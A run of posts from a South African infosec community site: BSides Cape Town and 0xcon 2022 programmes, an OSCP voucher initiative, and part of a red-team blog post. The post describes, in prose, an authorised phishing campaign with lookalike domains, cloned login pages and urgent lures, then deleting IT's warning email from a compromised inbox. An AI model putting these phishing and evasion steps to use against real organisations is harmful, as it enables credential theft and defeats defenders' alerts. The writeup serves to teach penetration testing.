<td>Opening remarks</td>
<td> </td>
</tr>
<tr>
<td>09h10</td>
<td>Entersekt Open</td>
<td> </td>
</tr>
<tr>
<td>09h15</td>
<td>(Keynote) Made in SA - For the world - Haroon Meer</td>
<td> </td>
</tr>
<tr>
<td>10h15</td>
<td>ALL BARK, NO BYTE - Amy Mania</td>
<td>An IOT War Story - Jason Spencer</td>
</tr>
<tr>
<td>11h00</td>
<td>Break</td>
<td>Break</td>
</tr>
<tr>
<td>11h15</td>
<td>Smart Watch Lobotomy - Dale Nunns</td>
<td>Securing a cloud native open source microservice based core banking system - Ntando Mngomezulu</td>
</tr>
<tr>
<td>12h</td>
<td>Lunch</td>
<td>Lunch</td>
</tr>
<tr>
<td>13h00</td>
<td>XXX astroturfing campaign - Roelof Temmingh</td>
<td>Abusing AWS permissions – Teaching an old dog new tricks - Jason kessel</td>
</tr>
<tr>
<td>13h50</td>
<td>Home Alone isn’t scary, it’s inspiration - Dev Dua, Tyron Kemp, Denver Abrey</td>
<td>– Pending –</td>
</tr>
<tr>
<td>14h35</td>
<td>Break</td>
<td>Break</td>
</tr>
<tr>
<td>14h50</td>
<td>The Russia-Ukraine War: A retrospective - Jared Naude</td>
<td>Permanently bricking smart contracts for fun and profit - Ashiq Amien</td>
</tr>
<tr>
<td>15h35</td>
<td>Break</td>
<td>Move back to Track 1</td>
</tr>
<tr>
<td>15h50</td>
<td>(Final Keynote) DECEPTION VIA PERCEPTION: Jayson E Street</td>
<td>Move back to Track 1</td>
</tr>
<tr>
<td>16h35</td>
<td>Prize Giving</td>
<td>Move back to Track 1</td>
</tr>
<tr>
<td>17h00</td>
<td>Closing Ceremony</td>
<td>Move back to Track 1</td>
</tr>
<tr>
<td> </td>
<td>AFTER PARTY</td>
<td> </td>
</tr>
</tbody>
</table>
<h3 id="workshop">Workshop:</h3>
<p>Iosiro will host a workshop. We will announce signup soon. For a sneek peak: <a href="https://iosiro.notion.site/Workshop-Introduction-to-Smart-Contract-Security-7b412d4fd420437fab1f053268cb1512">Workshop</a></p>
<h3 id="conclusion">Conclusion</h3>
<p>We can’t wait to see everyone in person!</p>Christo (Goose/crypticG00se) GoosenBsides Cape Town 2022 is a month away. We are excited to finally have Cape Town’s hacker summer camp and year end in person again. We have some really exciting speakers and a workshop. How to participate Get your tickets: https://qkt.io/M9YKVw Keep an eye on our youtube channel: Buy a hoodie: https://qkt.io/M9YKVw (Merchandise to be fetched on the day) Location Map: Google Maps Venue: https://tobmce.co.za/ More about venue: https://bsidescapetown.co.za/bsides-conf/2022-location Event Program Time Track 1 Track 2 08h00-09h00 Registration 09h00 Opening remarks 09h10 Entersekt Open 09h15 (Keynote) Made in SA - For the world - Haroon Meer 10h15 ALL BARK, NO BYTE - Amy Mania An IOT War Story - Jason Spencer 11h00 Break Break 11h15 Smart Watch Lobotomy - Dale Nunns Securing a cloud native open source microservice based core banking system - Ntando Mngomezulu 12h Lunch Lunch 13h00 XXX astroturfing campaign - Roelof Temmingh Abusing AWS permissions – Teaching an old dog new tricks - Jason kessel 13h50 Home Alone isn’t scary, it’s inspiration - Dev Dua, Tyron Kemp, Denver Abrey – Pending – 14h35 Break Break 14h50 The Russia-Ukraine War: A retrospective - Jared Naude Permanently bricking smart contracts for fun and profit - Ashiq Amien 15h35 Break Move back to Track 1 15h50 (Final Keynote) DECEPTION VIA PERCEPTION: Jayson E Street Move back to Track 1 16h35 Prize Giving Move back to Track 1 17h00 Closing Ceremony Move back to Track 1 AFTER PARTY Workshop: Iosiro will host a workshop. We will announce signup soon. For a sneek peak: Workshop Conclusion We can’t wait to see everyone in person!0xcon 20222022-10-17T00:00:00+00:002022-10-17T00:00:00+00:00https://hacksouth.africa/conferences/0xcon-2022<p>0xcon 2022 returns to an in-person event after 2 years of online virtual events due to Covid. For those unaware, 0xcon started in 2017 and is a South African conference that is aimed at building the Gauteng and ZA infosec community. The conference welcomes both new and experienced alike and works hard to keep things open and free to everyone.</p>
<h3 id="how-to-participate">How to participate</h3>
<ul>
<li>0xcon 2022 will take place on Saturday 12 November 2022 from 09:00 to 17:00 at the <a href="https://goo.gl/maps/E7D7qAFNMSTsDWR29">MTN Innovation Center (214 14th Avenue, Fairland, Johannesburg)</a>.</li>
<li>Tickets are free but you must <a href="https://www.quicket.co.za/events/186023-0xcon-2022#/">get tickets for parking and entrance to the venue.</a></li>
<li>Please note that you will need a Covid-19 vaccination certificate to gain entrance to the venue. If you have been vaccinated, you can get your certificate from the <a href="https://vaccine.certificate.health.gov.za/">Department of Health’s Vaccine Portal</a></li>
<li>RSVP to our <a href="https://www.linkedin.com/events/6987401479154225152/about/">LinkedIn event</a> and please share this with your friends and colleagues!</li>
</ul>
<h3 id="event-program">Event Program</h3>
<p><img src="/assets/images/0xcon/2022programv3.jpg" alt="Program" class="align-center" /></p>
<h2 id="pulling-passwords-out-of-configuration-manager-practical-attacks-against-microsofts-endpoint-management-software---christopher-panayi">Pulling Passwords out of Configuration Manager: Practical Attacks against Microsoft’s Endpoint Management Software - Christopher Panayi</h2>
<p>System Center Configuration Manager, now Microsoft Endpoint Configuration Manager (MECM), is a software management product that has been widely adopted by large organizations to deploy, update, and manage software; it is commonly responsible for the deployment and management of the majority of server and workstation machines in enterprise Windows environments.</p>
<p>This talk will provide an outline of how MECM is used to deploy machines into enterprise environments (typically through network booting, although it supports various Operating System deployment techniques), and will explore attacks that allow Active Directory credentials to be extracted from this process. The common MECM misconfigurations leading to these attacks will be detailed and, in so doing, the talk will aim to show how to identify and exploit these misconfigurations and how to defend against these attacks. Each viable attack will be discussed in depth (mostly by discussing the protocols and architecture in use, but sometimes by diving into relevant code, if necessary) so that the context of how and why the attack works will be understood. These concepts will be illustrated through the demo of PXEThief (https://github.com/MWR-CyberSec/PXEThief), a tool that allows for the extraction of credentials from several of the onsite deployment techniques that MECM supports.</p>
<p><em>About Christopher</em></p>
<p><a href="https://twitter.com/Raiona_ZA">Christopher</a> is the Chief Research Officer at <a href="https://mwrcybersec.com/">MWR CyberSec</a>, having previously led cyber-defense, red team, and targeted attack simulation (TAS) engagements for several years, as well as having designed and help run the in-house training programme for security consultants at MWR. As part of this work, a major focus area for him had been understanding attack techniques impacting Active Directory (AD); this led to publications such as a discussion of the previous gold standard in AD security, the red forest, and why it did not meet its goal of making environments more secure in many cases (<a href="https://www.f-secure.com/content/dam/press/ja/media-library/reports/F-Secure%20Whitepaper%20-%20Tending%20To%20the%20Red%20Forest%20(English).pdf">F-Secure Whitepaper - Tending To the Red Forest (English).pdf</a>). His interest in how things work at a deep technical level - and desire to develop an understanding of how to use this information to compromise and secure systems and environments - has led him to his current focus, investigating and understanding Microsoft Endpoint Configuration Manager, how it interacts with AD, and how to abuse its configuration to attack enterprise environments.</p>
<h2 id="2022-year-in-review---jared-naude">2022 Year in Review - Jared Naude</h2>
<p>Looking back at events that have taken place for lessons that can be learned is an important ingredient to enable forward insight, especially in the cyber security space. In this talk, I will go through the various security news, events and incidents of note that occurred in 2022 while adding some commentary and analysis from myself. This will primarily focus on the Russia-Ukraine invasion and the various failures that we have seen but will also cover trends in ransomware and malware, disinformation and breaches.</p>
<p><em>About Jared</em></p>
<p><a href="https://twitter.com/JaredNaude">Jared</a> is a Cloud Architect that specializes in enterprise cloud architecture and security; he is passionate about helping large organizations with architecting, building, securing and operationalizing cloud environments. Jared’s research interests and policy advocacy work involves cyber security topics that intersect with national security and foreign policy issues such as encryption, privacy, surveillance and disinformation.</p>
<h2 id="ransomware-and-incident-response-within-south-africa---ivan-burke">Ransomware and Incident response within South Africa - Ivan Burke</h2>
<p>This will cover key information items such as first responder actions which aid in better recovery of business processes, common pitfalls and misconceptions about service provider accountability and ability to assist during an active incident response. I will also be covering some resource users can use to test and practice internal incident response processes and scenario building. If there is interest in it, I can extend the talk length to include some case studies of IRs that took place during the year which we were involved in.</p>
<p><em>About Ivan</em></p>
<p><a href="https://twitter.com/ahyaimie">Ivan</a> has been a cyber security researcher working for the Council for Scientific and Industrial Research (CSIR), for 14 years. During this time he has worked for the Cyber Defence Research group and assisted on various governmental projects related to cyber defence. In October 2021, Ivan started to work at a private cyber security consulting and research company, called BlueVison ITM (https://bitm.co.za/). Ivan is currently employed as the Head of Research, innovation and Development at BlueVision, where his role is mostly to develop innovative strategies to prevent, detect and eradicate cyber threats within client environments. Over the past year BITM has coordinated numerous national IR processes for SMEs and larger state owned entities. BITM is fully CREST accredited for Incident Response, vulnerability management and penetration testing.</p>
<h2 id="investigating-the-coordinated-inauthentic-behavior-of-a-south-african-business-during-the-covid-lockdown---roelof-temmingh">Investigating the Coordinated Inauthentic Behavior of a South African Business during the Covid lockdown - Roelof Temmingh</h2>
<p>In the same way that hackers target computers, corporations target people’s minds and wallets. When exploits become marketing campaigns and semantic hackers become world leaders you know it’s time to shift your registers in a major way. CIB is the new buzzword and if you think it’s only the domain of St Petersburg troll farms you’ve missed the plot. Join this talk and see how this shit is happening from Sunnyside to Woodstock, from Melrose House to your treehouse</p>
<p><em>About Roelof</em></p>
<p><a href="https://twitter.com/RoelofTemmingh">Roelof</a> is the founder of SensePost, Maltego, and Vortimo. Stone cold badass and all around cool guy.</p>
<h2 id="hac---hacking-as-code-devsecops---christo-goosen">HaC - Hacking as Code (DevSecOps) - Christo Goosen</h2>
<p>A talk on SecureCodeBox + DefectDojo and doing vulnerability scanning as part of the DevSecOps pipeline. Automate OWASP ZAP, WhatWeb, SSLAlyze, NmapScan, etc with kubernetes configs. A deployed Kubernetes setup with a custom resource type scan for running jobs on your internal and external infra. Combine that with DefectDojo and helm/ArgoCD and you have a powerful hacking as code setup.</p>
<p><em>About Christo</em></p>
<p><a href="https://twitter.com/crypticg00se">Christo</a> is a DevSecOps lead and is always stuck in between development, infrastructure and security. Love to build, deploy and break systems. Crypto miner, python dev, Devops, etc. Photography & surfing to try and be offline. BSides Cape Town leader.</p>
<h2 id="pentesting-cloud-how-an-introduction-into-azure-pentesting---javan-mnjama">Pentesting Cloud… How? An introduction into Azure Pentesting - Javan Mnjama</h2>
<p>With the growth of cloud computing and the adoption of cloud. Security professionals are slowing being pushed from the traditional approach of pentesting and adapting in finding new techniques for cloud penetration testing. This talk will focus on a brief introduction into performing a penetration assessment against an Azure environment using the cyber attack kill chain from a cloud perspective. An overview will also be presented on the techniques and tooling available for offensive security professionals when reviewing Azure environments.</p>
<p><em>About Javan</em></p>
<p><a href="https://github.com/east-african-techguy">Javan</a> holds a Masters degree from Rhodes University and has had experience in penetration testing for five years where he has strong interest in cloud security. In his spare time, he enjoys going to the gym and making music.</p>
<h2 id="securing-a-cloud-native-open-source-microservice-based-core-banking-system---ntando-mngomezulu">Securing a cloud native open source microservice based core banking system - Ntando Mngomezulu</h2>
<p>Open Source in information systems is a fundamental driving force of collaboration, transparency, and accountability. Open-Source software also creates a conduit for rapidly prototyping ideas and deploying them to test their efficacy and evaluating their business case. In the FinTech sector, which is characterized by high paced innovation and stringent demands on privacy and confidentiality, these attributes are highly desirable as a mechanism to improve security of systems as a collaborative effort between security professionals to deliver exactly the type of software which we should strive to take to our markets.</p>
<p>In this talk, we will explore an example of collaboration on open-source software in order to deploy and test a FinTech system, namely FineractCN and its deployment on AWS in conjunction with Keycloak to effectively improve upon the security of a system which is built for the cloud native future we are moving into.</p>
<p><em>About Ntando</em></p>
<p><a href="https://www.linkedin.com/in/ntandomng">Ntando</a> is a Senior Security Analyst at Synthesis Software Technologies responsible for the establishment and continuous maintenance and testing of client organizations’ infrastructure, network, and web security. Ntando has over 10 years of IT experience within a variety of sectors such as health, broadcasting, streaming, and Fintech.</p>
<h2 id="dafuq---the-security-outlook-for-2023---charl-van-der-walt">Dafuq - The Security Outlook for 2023 - Charl van der Walt</h2>
<p>A look at what to expect for 2023.</p>
<p><em>About Charl</em></p>
<p><a href="https://twitter.com/charlvdwalt">Charl</a> is the Head of Security Research at Orange Cyber Defense</p>
<h3 id="conclusion">Conclusion</h3>
<p>We look forward to seeing everyone at our event!</p>0xcon0xcon 2022 returns to an in-person event after 2 years of online virtual events due to Covid. For those unaware, 0xcon started in 2017 and is a South African conference that is aimed at building the Gauteng and ZA infosec community. The conference welcomes both new and experienced alike and works hard to keep things open and free to everyone. How to participate 0xcon 2022 will take place on Saturday 12 November 2022 from 09:00 to 17:00 at the MTN Innovation Center (214 14th Avenue, Fairland, Johannesburg). Tickets are free but you must get tickets for parking and entrance to the venue. Please note that you will need a Covid-19 vaccination certificate to gain entrance to the venue. If you have been vaccinated, you can get your certificate from the Department of Health’s Vaccine Portal RSVP to our LinkedIn event and please share this with your friends and colleagues! Event Program Pulling Passwords out of Configuration Manager: Practical Attacks against Microsoft’s Endpoint Management Software - Christopher Panayi System Center Configuration Manager, now Microsoft Endpoint Configuration Manager (MECM), is a software management product that has been widely adopted by large organizations to deploy, update, and manage software; it is commonly responsible for the deployment and management of the majority of server and workstation machines in enterprise Windows environments. This talk will provide an outline of how MECM is used to deploy machines into enterprise environments (typically through network booting, although it supports various Operating System deployment techniques), and will explore attacks that allow Active Directory credentials to be extracted from this process. The common MECM misconfigurations leading to these attacks will be detailed and, in so doing, the talk will aim to show how to identify and exploit these misconfigurations and how to defend against these attacks. Each viable attack will be discussed in depth (mostly by discussing the protocols and architecture in use, but sometimes by diving into relevant code, if necessary) so that the context of how and why the attack works will be understood. These concepts will be illustrated through the demo of PXEThief (https://github.com/MWR-CyberSec/PXEThief), a tool that allows for the extraction of credentials from several of the onsite deployment techniques that MECM supports. About Christopher Christopher is the Chief Research Officer at MWR CyberSec, having previously led cyber-defense, red team, and targeted attack simulation (TAS) engagements for several years, as well as having designed and help run the in-house training programme for security consultants at MWR. As part of this work, a major focus area for him had been understanding attack techniques impacting Active Directory (AD); this led to publications such as a discussion of the previous gold standard in AD security, the red forest, and why it did not meet its goal of making environments more secure in many cases (F-Secure Whitepaper - Tending To the Red Forest (English).pdf). His interest in how things work at a deep technical level - and desire to develop an understanding of how to use this information to compromise and secure systems and environments - has led him to his current focus, investigating and understanding Microsoft Endpoint Configuration Manager, how it interacts with AD, and how to abuse its configuration to attack enterprise environments. 2022 Year in Review - Jared Naude Looking back at events that have taken place for lessons that can be learned is an important ingredient to enable forward insight, especially in the cyber security space. In this talk, I will go through the various security news, events and incidents of note that occurred in 2022 while adding some commentary and analysis from myself. This will primarily focus on the Russia-Ukraine invasion and the various failures that we have seen but will also cover trends in ransomware and malware, disinformation and breaches. About Jared Jared is a Cloud Architect that specializes in enterprise cloud architecture and security; he is passionate about helping large organizations with architecting, building, securing and operationalizing cloud environments. Jared’s research interests and policy advocacy work involves cyber security topics that intersect with national security and foreign policy issues such as encryption, privacy, surveillance and disinformation. Ransomware and Incident response within South Africa - Ivan Burke This will cover key information items such as first responder actions which aid in better recovery of business processes, common pitfalls and misconceptions about service provider accountability and ability to assist during an active incident response. I will also be covering some resource users can use to test and practice internal incident response processes and scenario building. If there is interest in it, I can extend the talk length to include some case studies of IRs that took place during the year which we were involved in. About Ivan Ivan has been a cyber security researcher working for the Council for Scientific and Industrial Research (CSIR), for 14 years. During this time he has worked for the Cyber Defence Research group and assisted on various governmental projects related to cyber defence. In October 2021, Ivan started to work at a private cyber security consulting and research company, called BlueVison ITM (https://bitm.co.za/). Ivan is currently employed as the Head of Research, innovation and Development at BlueVision, where his role is mostly to develop innovative strategies to prevent, detect and eradicate cyber threats within client environments. Over the past year BITM has coordinated numerous national IR processes for SMEs and larger state owned entities. BITM is fully CREST accredited for Incident Response, vulnerability management and penetration testing. Investigating the Coordinated Inauthentic Behavior of a South African Business during the Covid lockdown - Roelof Temmingh In the same way that hackers target computers, corporations target people’s minds and wallets. When exploits become marketing campaigns and semantic hackers become world leaders you know it’s time to shift your registers in a major way. CIB is the new buzzword and if you think it’s only the domain of St Petersburg troll farms you’ve missed the plot. Join this talk and see how this shit is happening from Sunnyside to Woodstock, from Melrose House to your treehouse About Roelof Roelof is the founder of SensePost, Maltego, and Vortimo. Stone cold badass and all around cool guy. HaC - Hacking as Code (DevSecOps) - Christo Goosen A talk on SecureCodeBox + DefectDojo and doing vulnerability scanning as part of the DevSecOps pipeline. Automate OWASP ZAP, WhatWeb, SSLAlyze, NmapScan, etc with kubernetes configs. A deployed Kubernetes setup with a custom resource type scan for running jobs on your internal and external infra. Combine that with DefectDojo and helm/ArgoCD and you have a powerful hacking as code setup. About Christo Christo is a DevSecOps lead and is always stuck in between development, infrastructure and security. Love to build, deploy and break systems. Crypto miner, python dev, Devops, etc. Photography & surfing to try and be offline. BSides Cape Town leader. Pentesting Cloud… How? An introduction into Azure Pentesting - Javan Mnjama With the growth of cloud computing and the adoption of cloud. Security professionals are slowing being pushed from the traditional approach of pentesting and adapting in finding new techniques for cloud penetration testing. This talk will focus on a brief introduction into performing a penetration assessment against an Azure environment using the cyber attack kill chain from a cloud perspective. An overview will also be presented on the techniques and tooling available for offensive security professionals when reviewing Azure environments. About Javan Javan holds a Masters degree from Rhodes University and has had experience in penetration testing for five years where he has strong interest in cloud security. In his spare time, he enjoys going to the gym and making music. Securing a cloud native open source microservice based core banking system - Ntando Mngomezulu Open Source in information systems is a fundamental driving force of collaboration, transparency, and accountability. Open-Source software also creates a conduit for rapidly prototyping ideas and deploying them to test their efficacy and evaluating their business case. In the FinTech sector, which is characterized by high paced innovation and stringent demands on privacy and confidentiality, these attributes are highly desirable as a mechanism to improve security of systems as a collaborative effort between security professionals to deliver exactly the type of software which we should strive to take to our markets. In this talk, we will explore an example of collaboration on open-source software in order to deploy and test a FinTech system, namely FineractCN and its deployment on AWS in conjunction with Keycloak to effectively improve upon the security of a system which is built for the cloud native future we are moving into. About Ntando Ntando is a Senior Security Analyst at Synthesis Software Technologies responsible for the establishment and continuous maintenance and testing of client organizations’ infrastructure, network, and web security. Ntando has over 10 years of IT experience within a variety of sectors such as health, broadcasting, streaming, and Fintech. Dafuq - The Security Outlook for 2023 - Charl van der Walt A look at what to expect for 2023. About Charl Charl is the Head of Security Research at Orange Cyber Defense Conclusion We look forward to seeing everyone at our event!PIFv22022-07-10T00:00:00+00:002022-07-10T00:00:00+00:00https://hacksouth.africa/community/PIF-v2<p><img src="/assets/images/payitforward/pif.gif" alt="Pay it forward" class="align-center" /></p>
<h1 id="as-many-people-in-the-infosec-community-are-aware---getting-your-oscp-is-something-life-changing--worldwide-there-are-a-vast-number-of-individuals-who-understand-what-a-golden-opportunity-it-is-to-complete-the-pwk-course-even-more-so-when-its-free">As many people in the InfoSec community are aware - getting your OSCP is something life-changing. <br /> Worldwide, there are a vast number of individuals who understand what a golden opportunity it is to complete the PWK course, even more so when it’s free.</h1>
<p style="text-align: center;"><strong><span style="background-color: white; color: black;padding: 2px; display: inline-block">Yes, FREE! <br /> No strings attached. <br /> We just want our community to succeed. </span></strong>
</p>
<h2 id="how-it-started">HOW IT STARTED:</h2>
<p>Following the death of George Floyd, <a href="https://www.offensive-security.com">Offensive Security</a> created their Social Responsibility Program. One of the goals of this program was to provide sets of <a href="https://www.offensive-security.com/pwk-oscp/">PEN200 / Penetration Testing with Kali Linux</a> vouchers to various community organisations around the world, who would be able to pass the voucher onto underrepresented individuals in the industry, or those who were trying to get into the industry.</p>
<h2 id="how-we-did-it">HOW WE DID IT:</h2>
<p>Initially the applicants were restricted to South Africans only, but due to a surprising and disappointingly poor response from local candidates, submissions were opened up to applicants from Africa. This was done in an effort to keep the initiative as <strong>local</strong> as possible, and not to lose our momentum.</p>
<h3 id="the-application-process-comprised-of-roughly-three-steps">The application process comprised of roughly three steps:</h3>
<ol>
<li>An application email, where the applicant needed to meet the criteria outlined <a href="https://hacksouth.africa/community/Pay-It-Forward">here</a>.</li>
<li>If an applicant was considered suitable, their submission was followed up with a video meeting (aka, “the interview”). This was primarily to get to know the candidate better, as well as determine if they would be a good fit.</li>
<li>Applicants were then asked to complete (aka ‘root’) three machines and submit a report.</li>
</ol>
<p>This ensured that (other than requiring access to a computer and/or data) the process was entirely free, <strong>and</strong> that candidates were at an adequate technical competency to:</p>
<ol>
<li>Manage and benefit from the content in the PWK course and,</li>
<li>Have a high likelihood of passing the exam after completing the course - as our intentions have always been to set our candidates up for success.</li>
</ol>
<h2 id="in-a-nutshell">IN A NUTSHELL:</h2>
<p>The campaign was aptly launched on Youth Day, 16 June 2021, and the final voucher was awarded on 25 May 2022. Below are some high-level stats from the last year:</p>
<ul>
<li>34 individuals applied to Pay It Forward</li>
<li>33 were male</li>
<li>1 applicant was female</li>
<li>12 were from South Africa</li>
<li>13 were from other African countries</li>
<li>9 were from countries outside of Africa</li>
<li>19 candidates were interviewed, 11 submitted reports and 10 vouchers were awarded.</li>
</ul>
<h2 id="our-pif-ers">OUR PIF-ERS:</h2>
<p>Congratulations to our ten awardees, in chronological order:</p>
<ol>
<li>1warrenshoko - South Africa</li>
<li>Hustlebunny - South Africa</li>
<li>Anonymous - Nigeria</li>
<li>Anonymous - Madagascar</li>
<li>Sp3ctrlM0nki3 - South Africa</li>
<li>SonOfABot - Nigeria</li>
<li>Anonymous - Madagascar</li>
<li>Anonymous - Nigeria</li>
<li>Anonymous - DRC</li>
<li>Gari - Rwanda</li>
</ol>
<h2 id="big-thanks">BIG THANKS:</h2>
<p>I’d like to thank AngusRed for his help during the first 6 months and to TOKO for the second half of this year long process. I couldn’t have done this without you two and I’m beyond grateful for your contribution to this initiative.</p>
<p>I’d also like to thank those who agreed to be mentors. Spymky ran a Buffer Overflow workshop recently for candidates, classes like this allow questions to be asked in real-time and candidates can benefit enormously from sessions like these, and we (as a collective) will continue to contribute to their ongoing success.</p>
<h2 id="but-wait-theres-more">BUT WAIT, THERE’S MORE:</h2>
<p>Initiatives like this rely on the generosity of those who see the value in them. On that note, I’m delighted to announce that I was able to secure <strong>another 10 PWK vouchers</strong> from Offensive Security, which means <strong>PIFv2</strong> will be starting up soon!</p>
<p><img src="/assets/images/payitforward/41DA3E0C-2AD1-4194-ADE1-3512AF29BFCF.PNG" alt="Pay it forward!" class="align-center" /></p>
<p>Candidates who have already applied will be prioritised, as well as South African candidates - but if you think you meet the criteria and would like to apply, please follow the instructions <a href="https://hacksouth.africa/community/Pay-It-Forward/">here</a>.</p>
<p style="text-align: center;"><strong><span style="background-color: white; color: black;padding: 2px; display: inline-block">I cannot wait to see what the next chapter of the Pay It Forward initiative will bring, and how many lives HackSouth is going to be able to change. </span></strong>
</p>MunXAs many people in the InfoSec community are aware - getting your OSCP is something life-changing. Worldwide, there are a vast number of individuals who understand what a golden opportunity it is to complete the PWK course, even more so when it’s free. Yes, FREE! No strings attached. We just want our community to succeed. HOW IT STARTED: Following the death of George Floyd, Offensive Security created their Social Responsibility Program. One of the goals of this program was to provide sets of PEN200 / Penetration Testing with Kali Linux vouchers to various community organisations around the world, who would be able to pass the voucher onto underrepresented individuals in the industry, or those who were trying to get into the industry. HOW WE DID IT: Initially the applicants were restricted to South Africans only, but due to a surprising and disappointingly poor response from local candidates, submissions were opened up to applicants from Africa. This was done in an effort to keep the initiative as local as possible, and not to lose our momentum. The application process comprised of roughly three steps: An application email, where the applicant needed to meet the criteria outlined here. If an applicant was considered suitable, their submission was followed up with a video meeting (aka, “the interview”). This was primarily to get to know the candidate better, as well as determine if they would be a good fit. Applicants were then asked to complete (aka ‘root’) three machines and submit a report. This ensured that (other than requiring access to a computer and/or data) the process was entirely free, and that candidates were at an adequate technical competency to: Manage and benefit from the content in the PWK course and, Have a high likelihood of passing the exam after completing the course - as our intentions have always been to set our candidates up for success. IN A NUTSHELL: The campaign was aptly launched on Youth Day, 16 June 2021, and the final voucher was awarded on 25 May 2022. Below are some high-level stats from the last year: 34 individuals applied to Pay It Forward 33 were male 1 applicant was female 12 were from South Africa 13 were from other African countries 9 were from countries outside of Africa 19 candidates were interviewed, 11 submitted reports and 10 vouchers were awarded. OUR PIF-ERS: Congratulations to our ten awardees, in chronological order: 1warrenshoko - South Africa Hustlebunny - South Africa Anonymous - Nigeria Anonymous - Madagascar Sp3ctrlM0nki3 - South Africa SonOfABot - Nigeria Anonymous - Madagascar Anonymous - Nigeria Anonymous - DRC Gari - Rwanda BIG THANKS: I’d like to thank AngusRed for his help during the first 6 months and to TOKO for the second half of this year long process. I couldn’t have done this without you two and I’m beyond grateful for your contribution to this initiative. I’d also like to thank those who agreed to be mentors. Spymky ran a Buffer Overflow workshop recently for candidates, classes like this allow questions to be asked in real-time and candidates can benefit enormously from sessions like these, and we (as a collective) will continue to contribute to their ongoing success. BUT WAIT, THERE’S MORE: Initiatives like this rely on the generosity of those who see the value in them. On that note, I’m delighted to announce that I was able to secure another 10 PWK vouchers from Offensive Security, which means PIFv2 will be starting up soon! Candidates who have already applied will be prioritised, as well as South African candidates - but if you think you meet the criteria and would like to apply, please follow the instructions here. I cannot wait to see what the next chapter of the Pay It Forward initiative will bring, and how many lives HackSouth is going to be able to change.Red Teaming - My first physical assessment2022-02-15T00:00:00+00:002022-02-15T00:00:00+00:00https://hacksouth.africa/careers/red-teaming-my-first-physical-assessment<p><img src="/assets/images/redteamingfirst/red-team-500px.jpg" alt="Preview" class="align-center" /></p>
<p><strong>Red Teaming - My first physical assessment</strong><br />
By <strong>chrismeistre</strong></p>
<p>I’ve recently been given the opportunity to perform my first physical assessment during a black box engagement for a client.</p>
<p>In short, the black box permitted us to try anything to gain access to their infrastructure, and assess their IT security awareness and defenses.</p>
<p>I was excited about this, and when the time finally came, I wasn’t left wanting.</p>
<p>If you’re reading this as an aspiring hacker, or just someone interested in cyber security or the infosec community, you’ve probably heard at least one story of a red teamer performing a physical assessment. I have listened to many interviews and read stories, so I thought I knew what to expect.</p>
<p>The TD;LR is that it’s definitely not as hard as I imagined it would be.</p>
<p>What I’d like to discuss in this article are the technical (a few) and social engineering (a lot) aspects of this engagement.</p>
<h3 id="our-goal">Our goal</h3>
<p>We decided that our goal for this engagement would be to fully compromise their internal network, and take over the domain controller. There was a feeling in the team that if we could just gain access into the internal network, the escalation to taking over the domain controller should not be too hard.</p>
<h4 id="a-side-note">A side note</h4>
<p>It is normally the case that once we get on the internal network, we’re able to escalate to a domain administrator with relative ease. Especially for companies that haven’t gone through an internal vulnerability assessment or penetration test. A lot of companies spend all their time and money on securing they external facing infrastructure, which is definitely a good thing. They do however forget that their internal network could be riddled with opportunities for an attacker.</p>
<h3 id="the-start-of-the-engagement">The start of the engagement</h3>
<p>Whenever we start with an engagement, we go through a checklist of things to do.</p>
<p>Amongst other things, it involves:</p>
<ol>
<li>Obtaining information (through OSINT) about the company and their employees</li>
<li>Compile a list of externally accessible devices (domains and IPs)</li>
<li>Do enumeration on the devices to determine what services are accessible to us</li>
<li>Look for low hanging fruit and/or weaknesses to exploit from the comfort of our offices</li>
</ol>
<p>During this black box, we spent a good number of days with the first phase. Although we found a number of critical vulnerabilities, it was not anything that would gain us access into the internal network.</p>
<h3 id="phishing">Phishing</h3>
<p>The second phase involved performing a phishing attack on the company.</p>
<p>The goal of phishing during a black box engagement is different to just performing a phishing attack assessment. For a black box, we are not testing to see how many clicks there are, or how many credentials are captured. We want to obtain valid credentials, and at the same time go undetected.</p>
<p>We were able to obtain a small number of valid emails addresses through OSINT.</p>
<p>I’m still working on my own methodology for phishing attacks, but here are a few things I do, which have proved quite successful so far:</p>
<ol>
<li>Register a domain that is very similar to the company’s domain. An example would be if you’re going to attack google.com, perhaps something like googlesupport.com is a good idea. We have also registered a number of domain names that are generic. I alternate between using a very targetted domain and generic ones, depending on who the target is.</li>
<li>Use web portals that you find during the first phase (enumerating) of the engagement, and setup a login page that looks similar. A lot of our clients are using security and spam solutions for emails, so it’s been getting a lot more difficult to create email content and fake pages based on ones that already exist. This is where my experience as a web application developer comes in, as I’m able to create pages pretty much from scratch, to still look the same, but be totally different. I also have a very generic login page that I use, where I just swop out the client’s logo each time.</li>
<li>Craft the emails that will go out to seem urgent enough that if they don’t respond soon, they might end off in trouble. This is also where a lot of time is spent, to compile and send off emails to see if it triggers any junk, spam or malicious filters.</li>
<li>Once the credentials are submitted on the page, redirect them to a page or a document that you appear legitimate. It’s good if you can find a page that is hosted on their own website. If nothing happens when they submit their credentials on the form, they might contact the IT department to determine if something is the matter.</li>
</ol>
<p>The first attempt at the phishing attack was not successful. We did not even get one click, which was very surprising to me, because this specific combination of email and landing page has always been successfully used.</p>
<p>I let it be for a few days, and then started delving into why it could possibly not have worked. It turned out that due to an error on our server, at the exact time we started the phishing campaign, none of the emails even reached the targets.</p>
<p>With this information at hand, we launched another attack. This time there was nothing for about 30 minutes, which is also odd, so I thought we had another issue. My frustration subsided as soon as the notification came in that we had a data submission. This means a target had clicked on the linked in the email, went to our fake site and filled in their username and password.</p>
<p>We used this information to access this person’s emails. Looking for keywords in their emails, we learned the following:</p>
<ol>
<li>The VPN software they are using has enabled 2FA on it. This meant that if we wanted to gain access through their VPN, we would have to gain access to this person’s cellphone or do a vhishing attack to obtain the auth token needed to complete the 2FA request while connecting to the VPN.</li>
<li>We found a number of usernames and passwords used to access external services.</li>
<li>We observed that the IT department had noticed our phishing attacks, and warned the users that if they have clicked on the link in the email, to immediately contact the IT support team to change passwords. To make sure our compromised user did not see that email, we deleted it from their inbox.</li>
<li>A complete contact list is available in the directory functionality of the webmail software, which allowed us to get a list of a lot more targets for a phishing attack. We could also set it up that the emails are sent directly from this person’s email address by making use of the webmail functionality.</li>
</ol>
<p>Based on the information we found about the steps taken when the phishing attack was noticed, we proceeded with a third attack.</p>
<p>We chose a smaller set of email addresses from users that appeared to be in less technical positions. The thinking is that users like these would be less likely to detect that the email they are receiving is not legitimate. We were again able to get at least one submission of valid credentials before the IT department detected the attack and proceeded to act against it. The password was changed the day after our attack.</p>
<p>Obtaining a valid set of credentials ended up being very important to us, even though we couldn’t use it to gain access to the internal network from the external devices with it.</p>
